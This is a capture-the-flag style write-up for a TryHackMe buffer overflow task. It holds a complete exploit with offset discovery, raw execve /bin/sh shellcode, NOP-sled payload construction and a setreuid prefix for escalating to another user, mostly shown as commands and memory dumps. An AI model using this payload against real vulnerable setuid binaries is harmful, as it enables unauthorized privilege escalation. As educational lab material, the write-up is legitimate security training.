THM - Buffer Overflow - T9
Finding the offset
gdb buffer-overflow-2
(gdb) run $(python -c "print('A'*165)") #--> 0x0000000000004141
(gdb) run $(python -c "print('A'*166)") #--> 0x0000000000414141
(gdb) run $(python -c "print('A'*167)") #--> 0x0000000041414141
(gdb) run $(python -c "print('A'*168)") #--> 0x0000004141414141
(gdb) run $(python -c "print('A'*169)") #--> 0x0000414141414141
169 is the right amount, which override perfectly the return address with 6 bytes.
So we know that with 169 bytes we override the 6-bytes-long return address. It means our offset to reach the start of the return address is 169-6 = 163
Picking a shell code
\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05
This shell code is 40 bytes
Finding the address of the shell code
Our payload will be 169 bytes in total : 163 to fill the buffer and 6 to override the return address pointing to the address of the shell code in the buffer.
PAYLOAD = JUNK(100 bytes) + SHELL CODE (40 bytes) + JUNK (23 byes) + RETURN ADDRESS (6 bytes).
Let's fill the junk with 'A's for now, and our return address with 6*'B'
gdb buffer-overflow
(gdb) run $(python -c "print 'A'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*23 + 'B'*6")
--> 0x0000424242424242
We will now examine the dump of the hex code with the command x/100x $rsp-200 which dumps 100*4 bytes from memory location $rsp -200 bytes.
(gdb) x/100x $rsp-200
0x7fffffffe8c8: 0x004005a9 0x00000000 0xf7ffa268 0x00007fff
0x7fffffffe8d8: 0xffffecea 0x00007fff 0x67676f64 0x4141416f
0x7fffffffe8e8: 0x41414141(!) 0x41414141 0x41414141 0x41414141 <--- start of the buffer
0x7fffffffe8f8: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe908: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe918: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe928: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe938: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe948: 0x583b6a41(!) 0x49d23148 0x622f2fb8 0x732f6e69 <--- start of the shellcode
0x7fffffffe958: 0xe8c14968 0x48504108 0x5752e789 0x0fe68948
0x7fffffffe968: 0x583c6a05 0x0fff3148 0x41414105 0x41414141
NOPs
Instead of filling the junk before the shell code with 'A' we fill it with NOPs (\x90).
gdb buffer-overflow
(gdb) run $(python -c "print '\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*23 + 'B'*6")
(gdb) x/100x $rsp-200
0x7fffffffe8c8: 0x004005a9 0x00000000 0xf7ffa268 0x00007fff
0x7fffffffe8d8: 0xffffecea 0x00007fff 0x67676f64 0x9090906f
0x7fffffffe8e8: 0x90909090(!) 0x90909090 0x90909090 0x90909090 <----- Nops start here
0x7fffffffe8f8: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe908: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe918: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe928: 0x90909090 0x90909090 0x90909090 0x90909090
0x7fffffffe938: 0x90909090(!) 0x90909090 0x90909090 0x90909090 <----- The address I pic
0x7fffffffe948: 0x583b6a90(!) 0x49d23148 0x622f2fb8 0x732f6e69 <----- shellcode
0x7fffffffe958: 0xe8c14968 0x48504108 0x5752e789 0x0fe68948
0x7fffffffe968: 0x583c6a05 0x0fff3148 0x41414105 0x41414141
You can now just pick any address as long as its in the NOPS, I'll pick 0x7fffffffe938
We need to convert it to little endian: 0x7fffffffe938 becomes 0x38e9ffffff7f and eventually \x38\xe9\xff\xff\xff\x7f
Shell test with correct return address
./buffer-overflow-2 $(python -c "print '\x90'*100+'\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*23 + '\x38\xe9\xff\xff\xff\x7f'")
we have shell but not as user3
Shellcode with setreuid
cat /etc/passwd
user3:x:1003:1003::/home/user3:/bin/bash
1003 = user3 UUID
Adjust shellcode
Install tool
apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools
Create shellcode prefix
pwn shellcraft -f d amd64.linux.setreuid 1003
\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05
14 bytes
New shellcode
./buffer-overflow-2 $(python -c "print '\x90'*86+'\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*23 + '\x38\xe9\xff\xff\xff\x7f'")